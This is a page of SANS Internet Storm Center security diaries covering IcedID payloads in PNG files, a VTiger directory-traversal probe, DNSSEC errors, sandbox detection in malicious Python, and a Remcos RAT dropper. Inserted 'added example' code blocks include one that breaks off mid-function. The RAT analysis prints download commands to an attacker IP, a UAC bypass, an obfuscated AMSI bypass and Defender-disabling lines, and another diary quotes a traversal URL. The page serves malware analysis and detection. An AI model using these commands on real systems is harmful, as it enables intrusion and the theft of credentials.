SANS

SANS Internet Storm Center - Cooperative Cyber Security Monitor
29 September 2022

PNG Analysis, (Thu, Sep 29th)

I updated my tool pngdump.py to deal with all the different samples tagged with PNG on MalwareBazaar.

The analysis results of a normal PNG file look like this:

But I also had samples that were not valid PNG files: the data of the IDAT chunk(s) was not zlib compressed. Notice the decompression error:

According to MalwareBazaar's info for these files, they were PNG files with an encrypted IcedID payload.

So I set out to write a small script that would help me detect PNG files carrying an IcedID payload.

There are a couple of decryptors online, like this one and this one. The payload is RC4 encrypted, and the RC4 key is in front of the payload (8 bytes long). One decryptor extracted the key from position 0 in the chunk data, another from position 5.

Decrypting this payload is not difficult, so I wrote a small script for my translate.py tool. It has two functions: Check and Decrypt.

I use Check to validate that the PNG I'm analyzing is an IcedID payload:

The key is found at offset 5, and the header and other metadata indicate that this is indeed IcedID.

If you want the decrypted payload, use function Decrypt, for example like this:

Here is another example with offset 0:
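As an added example (this is not pngdump.py or the translate.py script from the diary), the three steps described above in plain Python: walk the PNG chunks, check whether the concatenated IDAT data inflates as zlib, and if it does not, decrypt it with RC4 using the 8-byte key found at offset 0 or 5. The PNG files it runs on are constructed in the block itself, not real samples.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
KEY_LENGTH = 8  # the RC4 key in front of the payload is 8 bytes long


def iter_chunks(data):
    """Yield (chunk_type, chunk_data, crc_ok) for every chunk after the signature."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file: bad signature")
    pos = len(PNG_SIGNATURE)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if pos + 12 + length > len(data):
            raise ValueError("truncated chunk %r" % ctype)
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        crc_ok = (zlib.crc32(ctype + body) & 0xFFFFFFFF) == crc
        yield ctype, body, crc_ok
        pos += 12 + length
        if ctype == b"IEND":
            break


def idat_data(data):
    """Concatenate the data of all IDAT chunks (the image stream of a real PNG)."""
    return b"".join(body for ctype, body, _ in iter_chunks(data) if ctype == b"IDAT")


def check(data):
    """Check: True when the IDAT stream inflates as zlib, i.e. a genuine image.
    A decompression error means the IDAT chunks carry something else."""
    try:
        zlib.decompress(idat_data(data))
        return True
    except zlib.error:
        return False


def rc4(key, data):
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decrypt(data, key_offset):
    """Decrypt: take the 8-byte RC4 key at key_offset (0 or 5 in the samples seen)
    and decrypt everything in the IDAT stream that follows it."""
    stream = idat_data(data)
    key = stream[key_offset:key_offset + KEY_LENGTH]
    if len(key) != KEY_LENGTH:
        raise ValueError("IDAT data too short for a key at that offset")
    return rc4(key, stream[key_offset + KEY_LENGTH:])


def build_png(idat_body):
    """Build a minimal PNG around idat_body (constructed test data only)."""
    def chunk(ctype, body):
        crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
        return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # 1x1 pixel, 8-bit greyscale
    return PNG_SIGNATURE + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat_body) + chunk(b"IEND", b"")


# Constructed samples: one real 1x1 image, and two fakes whose IDAT holds
# key + RC4 ciphertext at offset 5 and at offset 0 (no real malware involved).
SAMPLE_KEY = bytes(range(1, KEY_LENGTH + 1))
SAMPLE_PLAINTEXT = b"constructed payload, stands in for the encrypted blob"
SAMPLE_VALID_PNG = build_png(zlib.compress(b"\x00\x00"))
SAMPLE_OFFSET5_PNG = build_png(b"\x00" * 5 + SAMPLE_KEY + rc4(SAMPLE_KEY, SAMPLE_PLAINTEXT))
SAMPLE_OFFSET0_PNG = build_png(SAMPLE_KEY + rc4(SAMPLE_KEY, SAMPLE_PLAINTEXT))

if __name__ == "__main__":
    for name, png in [("valid", SAMPLE_VALID_PNG), ("offset5", SAMPLE_OFFSET5_PNG)]:
        print(name, "IDAT is zlib:", check(png))
    print(decrypt(SAMPLE_OFFSET5_PNG, 5))
    print(decrypt(SAMPLE_OFFSET0_PNG, 0))
```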

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
29 September 2022

ISC Stormcast For Thursday, September 29th, 2022 https://isc.sans.edu/podcastdetail.html?id=8194, (Thu, Sep 29th)

28 September 2022

10 Years Later: Attacker re-discovering old VTiger CRM Vulnerability?, (Wed, Sep 28th)

Legacy software has a way of "hanging around." Just about a week ago I was reminded of a website I created for a friend in or around 1998, which has not changed since then (embarrassing links omitted). It went down after an upgrade to PHP 8.1 ;-). 

So it isn't surprising that every so often, attackers probe for some old flaws again. The following URL made our "First Seen" list this week:

/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fasterisk%2fsip.conf%00

A quick search shows that VTiger 5.1.0 was affected by a directory traversal vulnerability that could lead to arbitrary file inclusion (CVE-2012-4876). The exploit looks for an Asterisk configuration file, likely to exfiltrate credentials.

We have seen more and more attempts to go after VoIP configurations, brute forcing VoIP credentials or gaining access to the respective APIs. There is a lot of pressure right now to clamp down on spam calls and SMS messages. Telcos are more likely to filter spam, and third-party filtering software is becoming more popular. It is a bit like email spam, where attackers have for many years been interested in compromising accounts with large email providers just to use them to send spam. Attackers are looking for "clean" phone numbers to send their messages from. After all, how else will you get that extended warranty for your car? I recently wrote about some SIP brute forcing that appeared to be more linked to toll fraud, but using these systems for spam is another way to monetize compromised VoIP systems.
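Added example, not part of the diary: a small detector for the traversal pattern in the request above, which percent-decodes each query value until it is stable (so a double-encoded `..%252f` is caught too) and flags `..` path steps and null bytes. The first sample request is the URL quoted above; the other two are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed request lines for the test; the first is the URL quoted in the diary.
SAMPLE_REQUESTS = [
    "/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name="
    "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fasterisk%2fsip.conf%00",
    "/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=Accounts",
    "/index.php?page=..%252f..%252fetc%252fpasswd",   # double-encoded variant
]

# A ".." that is a whole path component, with either slash style.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def decode_fully(value, max_rounds=3):
    """Percent-decode until the value stops changing, so double encoding does not slip past."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_findings(request_line):
    """Map each suspicious query parameter to the reasons it was flagged."""
    findings = {}
    # parse_qsl already decodes one layer; decode_fully handles anything nested.
    for name, raw in parse_qsl(urlsplit(request_line).query, keep_blank_values=True):
        value = decode_fully(raw)
        reasons = []
        if TRAVERSAL.search(value):
            reasons.append("directory traversal")
        if "\x00" in value:
            reasons.append("null byte")
        if reasons:
            findings[name] = reasons
    return findings


def scan(request_lines):
    """Return (line, findings) for every request that shows traversal indicators."""
    return [(line, f) for line in request_lines if (f := traversal_findings(line))]


if __name__ == "__main__":
    for line, findings in scan(SAMPLE_REQUESTS):
        print(findings, line)
```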

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu

28 September 2022

ISC Stormcast For Wednesday, September 28th, 2022 https://isc.sans.edu/podcastdetail.html?id=8192, (Wed, Sep 28th)

27 September 2022

DNS Option 15: Debugging DNSSEC Errors., (Tue, Sep 27th)

DNSSEC has had a rough ride so far. I usually say that the mistake made with DNSSEC was that security came first in the design, ahead of usability. The result is that the implementation of DNSSEC is usually compliance driven and not widespread. There are two parts to implementing DNSSEC:

  • DNSSEC Validation: This is done by resolvers. A resolver may check if a record it receives is correctly signed before forwarding it. This is pretty easy to implement in resolvers, and many large public resolvers validate DNSSEC, and by doing so, they protect their users. You typically just need to enable the feature and ensure the current root zone key is configured correctly.
  • DNSSEC Signing: By digitally signing zone data (adding RRSIG and the necessary DNSKEY records), a particular zone is protected with DNSSEC. This is tricky as these signatures need to be maintained, and DS records verifying the keys need to be maintained with your registrar/parent zone. If you mess up, your zone will no longer resolve as long as the resolver validates the signatures.

One important issue is the "DS" record. Let's quickly review how DNSSEC works:

  1. For each zone ("domain"), you create one or more "Key Signing Keys"
  2. You use the Key Signing Key to sign some "Zone Signing Keys"
  3. The "Zone Signing Key" is used to create signatures for individual records.

Why the two keys? This is to optimize the tradeoff between key strengths, speed, and the need to maintain and rotate the keys.

The critical record here is the "DS" record: How does a resolver know that a zone is signed with DNSSEC, and which key to trust? The resolver for the parent zone will offer a DS record. This record is a hash of any Key Signing Key used by the zone. And this is why there are two keys:

  • Key Signing Key (KSK): a longer key that does not change often, because updating the corresponding DS record with the parent zone is a pain in some cases.
  • Zone Signing Key (ZSK): a shorter key. This way, the crypto is simpler/faster, and we rotate the key more often. It is signed using the KSK.

So, in short: no DS record -> no DNSSEC. If there is a DS record, you had better make sure DNSSEC works for your zone, or you end up with a self-inflicted DoS (I have done this a few times, as you will see).

I recently set up a new zone for internal use: sti-admin.com. I usually host my zones with Google, and Google makes DNSSEC pretty easy: You check a checkbox, and you are good to go. But, I wanted to do it the hard way because I needed a bit more flexibility for this domain to do dynamic updates and such. Now... I didn't want to skip DNSSEC as I somewhat believe in doing things securely no matter the pain. As I say: My shadow IT has its own shadow security stack. 

So I experimented with a BIND9 feature to automatically sign the zones. In the past, you had to run a script to add signature records to your zone file. This meant that you had to do some scripting to rotate keys and re-sign the zone every so often, and it didn't work well with dynamic updates. BIND introduced a feature to have the nameserver itself create the signature records "on the fly". All you do is add a "dnssec-policy" option to the zone. You may create your own policy if you do not like the default policy. Once you have done that, you are good to go: reload the configuration and named will automatically create keys and signature records.

But you still have to provide your registrar with the DS records so they can be signed by the parent zone. For Google, you do that via a simple form on their website.

Initially, I actually got it right, and it worked (amazing!). See below the graph from dnsviz.net, a great site to verify DNSSEC deployments.

But... why stop here? You learn if things go wrong!

So I wasn't happy with some of the configurations and started experimenting with different policies. Sadly, that broke things. And as I said: That is where you start learning. I did observe that the public resolver at '1.1.1.1' is answering in a peculiar way if DNSSEC is broken:

% dig sti-admin.com @1.1.1.1

; <<>> DiG 9.10.6 <<>> sti-admin.com @1.1.1.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 52403
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
; OPT=15: 00 0a 66 61 69 6c 65 64 20 74 6f 20 76 65 72 69 66 79 20 73 69 67 6e 61 74 75 72 65 73 20 66 6f 72 20 73 74 69 2d 61 64 6d 69 6e 2e 63 6f 6d 2e 20 6f 70 74 2d 6f 75 74 20 70 72 6f 6f 66 ("..failed to verify signatures for sti-admin.com. opt-out proof")
;; QUESTION SECTION:
;sti-admin.com.            IN    A

;; Query time: 124 msec
;; SERVER: 1.1.1.1#53(1.1.1.1)
;; WHEN: Tue Sep 27 08:42:13 EDT 2022
;; MSG SIZE  rcvd: 108

It uses an "Option 15" to provide a human-readable error message! Who would have thought about a user-friendly feature like that? The "dig" utility even displays this nicely for you.

I have not seen this from other nameservers, so this may be a Cloudflare special. But thanks, Cloudflare! :). The option is defined in RFC 8914. It isn't just useful for DNSSEC, but can be used any time a query fails and the DNS server would like to return more details rather than just a plain "ServFail" error.

Here is the complete packet:

08:41:40.176092 IP (tos 0x0, ttl 58, id 49070, offset 0, flags [DF], proto UDP (17), length 136)
    1.1.1.1.53 > 10.5.1.126.56671: [udp sum ok] 52403 ServFail q: A? sti-admin.com. 0/0/1 ar: . OPT UDPsize=1232 (108)
    0x0000:  4500 0088 bfae 4000 3a11 7332 0101 0101  E.....@.:.s2....
    0x0010:  0a05 017e 0035 dd5f 0074 7319 ccb3 8182  ...~.5._.ts.....
    0x0020:  0001 0000 0000 0001 0973 7469 2d61 646d  .........sti-adm
    0x0030:  696e 0363 6f6d 0000 0100 0100 0029 04d0  in.com.......)..
    0x0040:  0000 0000 0042 000f 003e 000a 6661 696c  .....B...>..fail
    0x0050:  6564 2074 6f20 7665 7269 6679 2073 6967  ed.to.verify.sig
    0x0060:  6e61 7475 7265 7320 666f 7220 7374 692d  natures.for.sti-
    0x0070:  6164 6d69 6e2e 636f 6d2e 206f 7074 2d6f  admin.com..opt-o
    0x0080:  7574 2070 726f 6f66                      ut.proof

The option data (highlighted in red and underlined in the screenshot) breaks down as follows:

000f - option code 15
003e - length (62 bytes)
000a - INFO-CODE: 10 = RRSIGs Missing

followed by the text description of the error.
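An added parser (not Johannes's code) that rebuilds the packet above from the tcpdump hex dump, skips the IP and UDP headers, walks the DNS message past the question to the OPT record in the additional section, and decodes option 15 as laid out above; the INFO-CODE names are the RFC 8914 registry values.

```python
import struct

# tcpdump -X output of the SERVFAIL response quoted in the diary (IP + UDP + DNS).
PACKET_HEXDUMP = """\
0x0000:  4500 0088 bfae 4000 3a11 7332 0101 0101  E.....@.:.s2....
0x0010:  0a05 017e 0035 dd5f 0074 7319 ccb3 8182  ...~.5._.ts.....
0x0020:  0001 0000 0000 0001 0973 7469 2d61 646d  .........sti-adm
0x0030:  696e 0363 6f6d 0000 0100 0100 0029 04d0  in.com.......)..
0x0040:  0000 0000 0042 000f 003e 000a 6661 696c  .....B...>..fail
0x0050:  6564 2074 6f20 7665 7269 6679 2073 6967  ed.to.verify.sig
0x0060:  6e61 7475 7265 7320 666f 7220 7374 692d  natures.for.sti-
0x0070:  6164 6d69 6e2e 636f 6d2e 206f 7074 2d6f  admin.com..opt-o
0x0080:  7574 2070 726f 6f66                      ut.proof
"""

# Extended DNS Error INFO-CODEs (RFC 8914, section 4).
EDE_CODES = {
    0: "Other Error", 1: "Unsupported DNSKEY Algorithm", 2: "Unsupported DS Digest Type",
    3: "Stale Answer", 4: "Forged Answer", 5: "DNSSEC Indeterminate", 6: "DNSSEC Bogus",
    7: "Signature Expired", 8: "Signature Not Yet Valid", 9: "DNSKEY Missing",
    10: "RRSIGs Missing", 11: "No Zone Key Bit Set", 12: "NSEC Missing", 13: "Cached Error",
    14: "Not Ready", 15: "Blocked", 16: "Censored", 17: "Filtered", 18: "Prohibited",
    19: "Stale NXDOMAIN Answer", 20: "Not Authoritative", 21: "Not Supported",
    22: "No Reachable Authority", 23: "Network Error", 24: "Invalid Data",
}
EDNS_OPTION_EDE = 15   # OPTION-CODE for Extended DNS Error
RRTYPE_OPT = 41        # the EDNS(0) pseudo-record


def hexdump_to_bytes(dump):
    """Turn tcpdump -X lines ('0x0010:  0a05 017e ...  ascii') back into raw bytes."""
    out = bytearray()
    for line in dump.splitlines():
        if ":" not in line:
            continue
        hex_field = line.split(":", 1)[1].strip().split("  ")[0]  # drop the ASCII column
        out += bytes.fromhex(hex_field.replace(" ", ""))
    return bytes(out)


def dns_payload(packet):
    """Strip the IPv4 header (length from the IHL nibble) and the 8-byte UDP header."""
    if packet[9] != 17:
        raise ValueError("not a UDP packet")
    ihl = (packet[0] & 0x0F) * 4
    return packet[ihl + 8:]


def read_name(msg, off):
    """Read a (possibly compressed) domain name; return (name, offset after it)."""
    labels = []
    while True:
        length = msg[off]
        if length == 0:
            return ".".join(labels) + ".", off + 1
        if length & 0xC0 == 0xC0:  # compression pointer into the message
            pointer = struct.unpack(">H", msg[off:off + 2])[0] & 0x3FFF
            target, _ = read_name(msg, pointer)
            return ".".join(labels + [target.rstrip(".")]) + ".", off + 2
        labels.append(msg[off + 1:off + 1 + length].decode("ascii"))
        off += 1 + length


def extended_dns_errors(msg):
    """Return (rcode, [(info_code, meaning, extra_text), ...]) for a DNS message."""
    _, flags, qdcount, ancount, nscount, arcount = struct.unpack(">6H", msg[:12])
    off = 12
    for _ in range(qdcount):
        _, off = read_name(msg, off)
        off += 4  # QTYPE + QCLASS
    errors = []
    for _ in range(ancount + nscount + arcount):
        _, off = read_name(msg, off)
        rtype, _, _, rdlength = struct.unpack(">HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlength]
        off += rdlength
        if rtype != RRTYPE_OPT:
            continue
        pos = 0
        while pos + 4 <= len(rdata):  # walk the EDNS option list in RDATA
            code, olen = struct.unpack(">HH", rdata[pos:pos + 4])
            odata = rdata[pos + 4:pos + 4 + olen]
            pos += 4 + olen
            if code == EDNS_OPTION_EDE and len(odata) >= 2:
                info = struct.unpack(">H", odata[:2])[0]
                text = odata[2:].decode("utf-8", "replace")
                errors.append((info, EDE_CODES.get(info, "Unassigned"), text))
    return flags & 0x000F, errors


if __name__ == "__main__":
    rcode, errors = extended_dns_errors(dns_payload(hexdump_to_bytes(PACKET_HEXDUMP)))
    print("RCODE:", rcode)
    for info, meaning, text in errors:
        print(f"EDE {info} ({meaning}): {text!r}")
```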

Next step: a Snort signature to alert me if one of my zones is badly signed and triggers this error :). But maybe a cron job that resolves them via 1.1.1.1 will be an easier way to detect errors.

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu

27 September 2022

ISC Stormcast For Tuesday, September 27th, 2022 https://isc.sans.edu/podcastdetail.html?id=8190, (Tue, Sep 27th)

26 September 2022

Easy Python Sandbox Detection , (Mon, Sep 26th)

Many malicious Python scripts implement a sandbox detection mechanism (I already wrote diaries about this[1]), but it requires some extra code in the script. Because we are lazy (attackers too), why not automate this and easily detect the presence of such a security mechanism?

I spotted an interesting script (VT score 3/60) that uses a Python library I encountered for the first time: "sandboxed". It has a method to easily detect the presence of a sandbox:

from sandboxed import is_sandboxed
import sys
certainty = is_sandboxed(logging=False)
if int(certainty)>0.5:
    sys.exit()
import zlib,base64,ssl,socket,struct,time
[...]

The library project repository[2] explains the checks performed:

  • Machine specifications
  • File systems
  • Internet access

For sure, it's not bulletproof, but it could probably spot a lot of sandboxes! Note that this module focuses on Windows sandboxes; I had a look at the code, and there are only references to Windows artifacts:

_FILES = [
    r"C:\WINDOWS\system32\drivers\VBoxMouse.sys",
    r"C:\WINDOWS\system32\drivers\VBoxGuest.sys",
    r"C:\WINDOWS\system32\drivers\VBoxSF.sys",
    r"C:\WINDOWS\system32\drivers\VBoxVideo.sys",
    r"C:\WINDOWS\system32\vboxdisp.dll",
    r"C:\WINDOWS\system32\vboxhook.dll",
    r"C:\WINDOWS\system32\vboxmrxnp.dll",
    r"C:\WINDOWS\system32\vboxogl.dll",
    r"C:\WINDOWS\system32\vboxoglarrayspu.dll",
    r"C:\WINDOWS\system32\vboxoglcrutil.dll",
    r"C:\WINDOWS\system32\vboxoglerrorspu.dll",
    r"C:\WINDOWS\system32\vboxoglfeedbackspu.dll",
    r"C:\WINDOWS\system32\vboxoglpackspu.dll",
    r"C:\WINDOWS\system32\vboxoglpassthroughspu.dll",
    r"C:\WINDOWS\system32\vboxservice.exe",
    r"C:\WINDOWS\system32\vboxtray.exe",
    r"C:\WINDOWS\system32\VBoxControl.exe",
    r"C:\WINDOWS\system32\drivers\vmmouse.sys",
    r"C:\WINDOWS\system32\drivers\vmhgfs.sys",
    r"C:\WINDOWS\system32\drivers\vmusbmouse.sys",
    r"C:\WINDOWS\system32\drivers\vmkdb.sys",
    r"C:\WINDOWS\system32\drivers\vmrawdsk.sys",
    r"C:\WINDOWS\system32\drivers\vmmemctl.sys",
    r"C:\WINDOWS\system32\drivers\vm3dmp.sys",
    r"C:\WINDOWS\system32\drivers\vmci.sys",
    r"C:\WINDOWS\system32\drivers\vmsci.sys",
    r"C:\WINDOWS\system32\drivers\vmx_svga.sys",
]
_PROCESSES = [
    "vboxservices.exe",
    "vboxservice.exe",
    "vboxtray.exe",
    "xenservice.exe",
    "VMSrvc.exe",
    "vemusrvc.exe",
    "VMUSrvc.exe",
    "qemu-ga.exe",
    "prl_cc.exe",
    "prl_tools.exe",
    "vmtoolsd.exe",
    "df5serv.exe",
]

[1] https://isc.sans.edu/forums/diary/Sandbox+Evasion+Using+NTP/26534
[2] https://github.com/frederikme/sandboxed

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

26 September 2022

ISC Stormcast For Monday, September 26th, 2022 https://isc.sans.edu/podcastdetail.html?id=8188, (Mon, Sep 26th)

25 September 2022

Downloading Samples From Takendown Domains, (Sun, Sep 25th)

Sometimes I want to download a sample from a malicious server, but the domain name no longer resolves (it has been taken down).

In that case, I search historical DNS data for the IPv4 address of the server, and then connect to the server via its IPv4 address, like this:

That often fails, because the server is hosting many sites.

In that case, I add a Host header with the domain name:

This regularly works for me, because the domain has been taken down but the server/file has not (yet).

For TLS, we will get an error:

That's because we are using an IPv4 address instead of a domain name.

In that case, I use option --insecure to ignore certificate errors:

When I download samples, I also use other options to go over a proxy/Tor and to log extra information, like response headers and a trace.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

25 September 2022

Maldoc Analysis Info On MalwareBazaar, (Sat, Sep 24th)

When you look up a malicious document sample on MalwareBazaar, like this sample, you can see analysis data from olevba and oledump.

So if you suspect that a document you received is malicious, you can look it up on, or submit it to, MalwareBazaar and get an initial analysis without local tools.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

23 September 2022

Kids Like Cookies, Malware Too!, (Fri, Sep 23rd)

Recently, a vulnerability has been disclosed by Vectra that affects Microsoft Teams[1], the very popular communication tool used daily by millions of people (me too). Security researchers found that Teams stores session tokens in clear text on the file system. I won’t discuss the vulnerability here; read the blog post if you want to learn more. The critical element is that once the token has been stolen, an attacker can impersonate the user.

At the end of the blog post, Vectra lists interesting files to watch on the file system. For the Windows operating system, there are:

%AppData%\Microsoft\Teams\Cookies
%AppData%\Microsoft\Teams\Local Storage\leveldb

After reading this, I was curious to see if this is already exploited in the wild. I created a new hunting rule on VT and crossed my fingers. After a few false positives, I got a hit! A DLL was uploaded and contained one of the two strings above.

The file was called “RwWork.dll” (SHA256:5092a18330debda930a73835c8e77c6a7fb3a5904bdc04aad61c6c4136f0d24b). It currently has a VT score of 56/71[2]. The file does indeed look for Teams cookies, but for much more as well:

As you can see, many files related to cookies are searched. The malware is from the Floxif family...

[1] https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
[2] https://www.virustotal.com/gui/file/5092a18330debda930a73835c8e77c6a7fb3a5904bdc04aad61c6c4136f0d24b/details

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

23 September 2022

ISC Stormcast For Friday, September 23rd, 2022 https://isc.sans.edu/podcastdetail.html?id=8186, (Fri, Sep 23rd)

22 September 2022

RAT Delivered Through FODHelper , (Thu, Sep 22nd)

I found a simple batch file that drops a Remcos[1] RAT through an old UAC Bypass technique. This technique is based on the "fodhelper" utility ("Features On Demand Helper"). Once launched, this tool will search for specific registry keys and, if present, will execute their content with high privileges.

The script, called "2.bat", is very simple. Note that when opened in a text editor, it will display Chinese characters due to the BOM (Byte Order Mark):

remnux@remnux:/MalwareZoo/20220919$ xxd 2.bat
00000000: fffe 2663 6c73 0d0a 4065 6368 6f20 6f66  ..&cls..@echo of
00000010: 6620 0d0a 5469 746c 6520 257e 6e30 0d0a  f ..Title %~n0..
00000020: 4d6f 6465 2036 302c 3320 0d0a 636f 6c6f  Mode 60,3 ..colo
00000030: 7220 3042 0d0a 6563 686f 280d 0a65 6368  r 0B..echo(..ech
00000040: 6f20 2020 2020 2020 2020 506c 6561 7365  o         Please
00000050: 2077 6169 742e 2e2e 2061 2077 6869 6c65   wait... a while
00000060: 204c 6f61 6469 6e67 2064 6174 6120 2e2e   Loading data ..
00000070: 2e2e 0d0a 4345 5254 5554 494c 202d 6620  ....CERTUTIL -f 

Here is the decoded script:

cls
@echo off
Title %~n0
Mode 60,3
color 0B
echo(
echo Please wait... a while Loading data ....
CERTUTIL -f -decode "%~f0" "%Temp%\2.bat" >nul 2>&1
cls
"%Temp%\2.bat"
Exit
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----

certutil.exe (a common LOLBin) is used to decode the Base64 data present in the file, dump a new .bat file and launch it. This is performed thanks to "%~f0", which expands to the full path of the batch file itself. Here is the decoded bat file:

@echo off
echo Please wait 30 seconds: we're bypassing the AuthID(HWID). This tray will autoclose once finished.
curl.exe -s --output %USERPROFILE%\Links\puedo.ps1 --url hxxp://171[.]22[.]30[.]120/puedo.ps1
timeout 5 > nul
curl.exe -s --output %USERPROFILE%\Links\adhd.bat --url hxxp://171[.]22[.]30[.]120/adhd.bat
timeout 5 > nul
curl.exe -s --output %USERPROFILE%\Links\net.vbs --url hxxp://171[.]22[.]30[.]120/net.vbs
timeout 5 > nul
powershell New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value %USERPROFILE%\Links\adhd.bat -Force
powershell New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
fodhelper
exit
Del %~0

Once fodhelper is launched, it will execute adhd.bat, which uses the same technique:

cls
@echo off
Title %~n0
Mode 60,3
color 0B
echo(
echo Please wait... a while Loading data ....
CERTUTIL -f -decode "%~f0" "%Temp%\adhd - Copia.bat" >nul 2>&1
cls
"%Temp%\adhd - Copia.bat"
Exit
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----

The decoded Base64 contains:

@echo off
echo Almost finished: it will autoruns in less than 15 seconds!
cd %USERPROFILE%\Links\
PowerShell -ExecutionPolicy Bypass -File "puedo.ps1"
echo Almost finished: it will autoruns in less than 15 seconds!
timeout 10 > nul
start net.vbs
exit
Del %~0

The Powershell script "puedo.ps1" is responsible for downloading and executing the malware:

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Set-MpPreference -DisableRealtimeMonitoring $trUE
Set-MpPreference -DisableIOAVProtection $trUE
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:"
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\"
curl.exe -s --output ("photoscreen\$env:USERNAME\Links\Zu@E.jpeg".Replace('photo','C:\').Replace('screen','Users\').Replace('Zu@E','\zoey').Replace('jpeg','exe')) --url ("colibri://google/Papero.exe".Replace('colibri','http').Replace('google','171[.]22[.]30[.]120'))
cd C:\Users\$env:USERNAME\Links
.\zoey.exe
exit

Note that the script tries to disable AMSI and Microsoft Defender. The malware is a Remcos RAT (SHA256:6e83574ed73d798183a1555a910dcc118ac05cf1eac77306ab6edfdcab9207c3) with the following config:

{
  "c2": [ "171[.]22[.]30[.]7:5578" ],
  "attr": {
    "mutex": "asf4fas8sf48asf84as4f89huhhu99h9h-V446WS",
    "copy_file": "Isass.exe",
    "hide_file": false,
    "copy_folder": "Microsoft Updater",
    "delete_file": false,
    "keylog_file": "logs.dat",
    "keylog_flag": false,
    "audio_folder": "MicRecords",
    "install_flag": true,
    "install_path": "%ProgramFiles%",
    "keylog_crypt": false,
    "mouse_option": false,
    "connect_delay": "0",
    "keylog_folder": "remcos",
    "startup_value": "Windows Host Controller",
    "screenshot_flag": false,
    "screenshot_path": "%AppData%",
    "screenshot_time": "10",
    "connect_interval": "1",
    "hide_keylog_file": false,
    "screenshot_crypt": false,
    "audio_record_time": "5",
    "screenshot_folder": "Screenshots",
    "take_screenshot_time": "5",
    "take_screenshot_option": false
  },
  "rule": "Remcos",
  "botnet": "Papero",
  "family": "remcos"
}
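Added example, not part of the diary: detection logic for the behaviours this chain leaves in telemetry (the ms-settings open handler and DelegateExecute registry writes that fodhelper consults, certutil -decode, and Defender being switched off), run over constructed Sysmon-like event records. The field names (type, key, value_name, data, image, command_line) are an assumed schema and the sample events are made up to mirror the scripts above.

```python
import re

# Constructed event records mirroring the scripts above; the schema is assumed,
# the paths are made up, and the last event is a benign certutil use that must not fire.
SAMPLE_EVENTS = [
    {"type": "registry_set", "image": "powershell.exe",
     "key": r"HKCU\Software\Classes\ms-settings\shell\open\command",
     "value_name": "(Default)", "data": r"C:\Users\bob\Links\adhd.bat"},
    {"type": "registry_set", "image": "powershell.exe",
     "key": r"HKCU\Software\Classes\ms-settings\shell\open\command",
     "value_name": "DelegateExecute", "data": ""},
    {"type": "process_create", "image": "certutil.exe",
     "command_line": r'CERTUTIL -f -decode "C:\Users\bob\Downloads\2.bat" "C:\Users\bob\AppData\Local\Temp\2.bat"'},
    {"type": "process_create", "image": "powershell.exe",
     "command_line": "powershell Set-MpPreference -DisableRealtimeMonitoring $trUE"},
    {"type": "process_create", "image": "certutil.exe",
     "command_line": "certutil -hashfile report.pdf SHA256"},
]

# The handler key fodhelper consults; match on the tail so HKCU and HKU\<SID> forms both hit.
MS_SETTINGS_HANDLER = re.compile(r"\\Software\\Classes\\ms-settings\\shell\\open\\command$", re.I)


def classify(event):
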